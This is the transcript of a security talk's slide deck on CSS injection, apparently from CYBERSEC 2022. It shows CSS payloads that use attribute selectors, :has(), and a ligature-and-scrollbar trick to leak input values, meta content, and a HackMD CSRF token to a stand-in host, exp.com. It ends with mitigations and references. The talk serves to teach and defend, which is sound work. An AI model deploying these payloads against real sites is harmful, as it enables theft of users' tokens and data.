$30 off During Our Annual Pro Sale. View Details »

Attacking web without JS - CSS injection

Huli
September 22, 2022

Attacking web without JS - CSS injection

When speaking of web security in front-end, XSS is the first thing that comes to mind. But, even without JavaScript, the attacker can still use other attack vectors like HTML injection and CSS injection! This talk is an introduction to CSS injection.

Huli

September 22, 2022
Tweet

More Decks by Huli

Other Decks in Programming

Transcript

  1. Attacking web without JS
    CSS Injection
    Huli from Cymetrics / OneInfinity @ CYBERSEC 2022

    View Slide

  2. About
    Huli

    • Security Researcher at Cymetrics /
    OneInfinity

    • CTF player at Water Paddler

    • https://blog.huli.tw/

    View Slide

  3. Front-end Security

    View Slide

  4. Front-end Security
    => XSS(Cross-Site Scripting)

    View Slide

  5. Front-end Security
    => XSS(Cross-Site Scripting)

    View Slide

  6. IE7 (15 years ago)

    View Slide

  7. CSS injection
    => Steal data via CSS

    View Slide

  8. CSS injection
    => Steal data via CSS
    How?

    View Slide

  9. input[value^="a"]{
    background: url("//exp.com?a");
    }

    View Slide

  10. CSS selectors
    input[value^="a"] // prefix
    input[value$="a"] // suffix
    input[value*="a"] // contains

    View Slide

  11. Steal input value





    View Slide

  12. Steal input value





    input[value^="a"]{
    background: url("//exp.com?a");
    }

    View Slide

  13. Steal input value





    input[value^="a"] + input {
    background: url("//exp.com?a");
    }

    View Slide

  14. Steal input value





    View Slide

  15. has: to the rescue





    form:has(input[value^="a"]) {
    background: url("//exp.com?a");
    }

    View Slide

  16. View Slide

  17. Steal meta content



    View Slide

  18. Steal meta content



    meta[content^="a"] {
    background: url(//exp.com?a);
    }

    View Slide

  19. Steal meta content



    meta[content^="a"] {
    background: url(//exp.com?a);
    }

    View Slide

  20. Steal meta content



    meta {
    display: block;
    }
    meta[content^="a"] {
    background: url(//exp.com?a);
    }

    View Slide

  21. Steal meta content



    meta {
    display: block;
    }
    meta[content^="a"] {
    background: url(//exp.com?a);
    }

    View Slide

  22. Steal meta content



    meta[content^="a"] {
    background: url(//exp.com?a);
    }

    View Slide

  23. Steal meta content



    meta, head {
    display: block;
    }
    meta[content^="a"] {
    background: url(//exp.com?a);
    }

    View Slide

  24. View Slide

  25. View Slide

  26. Steal HackMD CSRF token

    View Slide

  27. Steal HackMD CSRF token

    View Slide

  28. Steal HackMD CSRF token
    HackMD Server

    View Slide

  29. Steal HackMD CSRF token
    HackMD Server
    server?token=a

    View Slide

  30. Steal HackMD CSRF token
    HackMD Server
    server?token=a
    Update content and <br/>

    View Slide

  31. Steal HackMD CSRF token
    HackMD Server
    server?token=ab
    Update content and <br/>

    View Slide

  32. Demo

    View Slide

  33. Steal CSRF token != CSRF 😢

    View Slide

  34. Steal any content
    <br/>var secret = "abc123";<br/>
    Is it possible?

    View Slide

  35. ligature
    https://zh.m.wikipedia.org/zh-tw/File:Ligatures.svg

    View Slide

  36. ligature




    horiz-adv-x="10000" d="M1 0z"/>



    View Slide

  37. ligature + scroll bar
    script {
    width: 300px;
    display: block;
    font-family: "leak";
    white-space: nowrap;
    overflow-x: auto;
    }
    script::-webkit-scrollbar {
    background: blue;
    }
    script::-webkit-scrollbar:horizontal {
    background: url(https://exp.com?a);
    }

    View Slide

  38. ligature + scroll bar

    View Slide

  39. Mitigation
    • Sanitization

    • Content Security Policy

    • style-src

    • font-src

    • Check origin/referer header

    • Same-site cookie

    View Slide

  40. Reference
    1. https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf
    2. https://x-c3ll.github.io/posts/CSS-Injection-Primitives/
    3. https://book.hacktricks.xyz/pentesting-web/xs-search/css-injection
    4. https://research.securitum.com/stealing-data-in-great-style-how-to-use-css-to-attack-
    web-application/
    5. https://mksben.l0.cm/2021/11/css-exfiltration-svg-font.html
    6. https://github.com/masatokinugawa/css-exfiltration-svg-font/

    View Slide

  41. Q&A

    View Slide